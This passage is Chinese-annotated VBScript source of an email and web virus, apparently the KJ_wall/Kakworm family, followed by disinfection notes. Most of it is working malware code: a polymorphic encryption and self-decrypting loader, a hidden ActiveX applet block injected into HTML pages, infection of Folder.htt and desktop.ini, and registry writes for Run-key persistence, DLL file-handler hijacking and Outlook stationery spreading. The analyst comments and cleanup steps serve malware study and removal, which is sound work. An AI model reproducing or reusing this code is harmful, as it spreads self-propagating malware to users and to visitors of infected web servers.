If InWhere = "vbs" Then ' 如果安装了 SCRIPT HOST就方便了许多
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else ' 如果安装时没有选择 SCRIPT HOST 那么病毒就自己配置,看来WINDOWS没有按照用户的要求去做
Set AppleObject = document.applets("KJ_guest") ' 通过KJ_guest向系统注册一个脚本解释器
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object
AppleObject.createInstance() ' 使用SCRIPT HOST 来执行各种操作,这就是提倡大家安装98时,不要安装SCRIPT HOST的原因
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' 功能强大的 FileSystem Object
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives ' 得到系统的硬盘和软盘驱动器
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For ' 如果不是硬盘或者软盘则不能感染
End If
FinalyDisk = DiskTemp.DriveLetter ' 系统中硬盘最后一个盘符
Next
Dim OtherArr(3) ' 一个随机数组
Randomize
For i = 0 To 3
OtherArr(i) = Int((9 * Rnd)) ' 从 0 到 9
Next
TempString = ""
For i = 1 To Len(ThisText) ' 从1到病毒体的长度,看来下面是对病毒的解密部分
TempNum = Asc(Mid(ThisText, i, 1)) ' 取第I处的字符ASC值
If TempNum = 13 Then ' 如果是13
TempNum = 28 ' 强制替换为28
ElseIf TempNum = 10 Then ' 如果是10
TempNum = 29 ' 强制替换为29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4)) ' I处的字符ASC码-I和4取余数
If TempChar = Chr(34) Then ' 如果等于34,则替换为18
TempChar = Chr(18)
End If
TempString = TempString & TempChar ' 已经生成了伪装好的病毒代码字符串,完全随机的
Next ' 下一句比较烦
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document..write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XCom _
nent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
'UnLockStr 就是执行病毒的字符串,下面是实际执行的内容
'
'Dim KeyArr(3),ThisText
'KeyArr(0) = OtherArr(0)
'KeyArr(1) = OtherArr(1)
'KeyArr(2) = OtherArr(2)
'KeyArr(3) = OtherArr(3)
'For i=1 To Len(ExeString)
' TempNum = Asc(Mid(ExeString,i,1))
' If TempNum = 18 Then
' TempNum = 34
' End If
' TempChar = Chr(TempNum + KeyArr(i Mod 4))
' If TempChar = Chr(28) Then
' TempChar = vbCr
' ElseIf TempChar = Chr(29) Then
' TempChar = vbLf
' End If
' ThisText = ThisText & TempChar
'Next 上面执行后,已经构造成功一个ThisText命令串
' "Execute(ThisText) " 是一个字符串,网页中可以找到
' ThisText = "ExeString = TempString 字符的内容" ,这里是为THISTEXT赋值
' HtmlText =
' <script language=vbscript>
' <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
' <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
' </APPLET>
' </div>
' </script>
' <script language=vbscript>
' ThisText 网页中可以找到的部分,就是 "ExeString=..."
' UnLockStr Execute("Dim KeyArr(3)...."
' </script>
' </BODY>
' </HTML>
'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then ' 更深层次的感染
FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"
End If '如果这个机器是WEB服务器,那么浏览过这个服务器的所有用户都将被感染
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"
End If
End Function
' 有了以上分析,解毒的话就方便多了
' 解毒内容
' 1. 对于HTT文件
' 第一行是病毒的开始,应但删除 开始的0X24个BYTES应当删除
' 从文件结束倒退(0X5A0A-0X2D3C+1=)0X2CCF个BYTES应当删除
' 2. 对于HTML,ASP,PHP,JSP文件
' 从文件结尾倒退(0X5E4E-0X3153+1=)0X2CFC应当删除
' 3. 对于VBS文件
' 只要删除文件最后0X2B97+2(回车)个BYTES就可以了
' 4. 至于KERNEL.DLL,可以直接删除,为保险起见,也可以删除文件最后0X2B97个BYTES
' 5. 还有kjwall.gif,直接删除.
' 6. 要对修改过的注册表进行恢复
' WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call
' KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
' WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
' RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
' ****************************************************************
' HKEY_CURRENT_USER\Identities\Default User ID 如果有SOFTWARE\等等的话,删除后面的SOFTWARE,其余的保留即可
' HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference 键值清空即可
' HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 清空
' HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 清空
' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference 清空
' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery 清空
' HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32 清空
' HKEY_CLASSES_ROOT\.dll 删除.DLL及下面所有东西
' HKEY_CLASSES_ROOT\dllfile\DefaultIcon\ 删除DLLFILE及下面所有东西
' HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command
' HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps
' HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode
' HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree 删除DEGREE及下面所有东西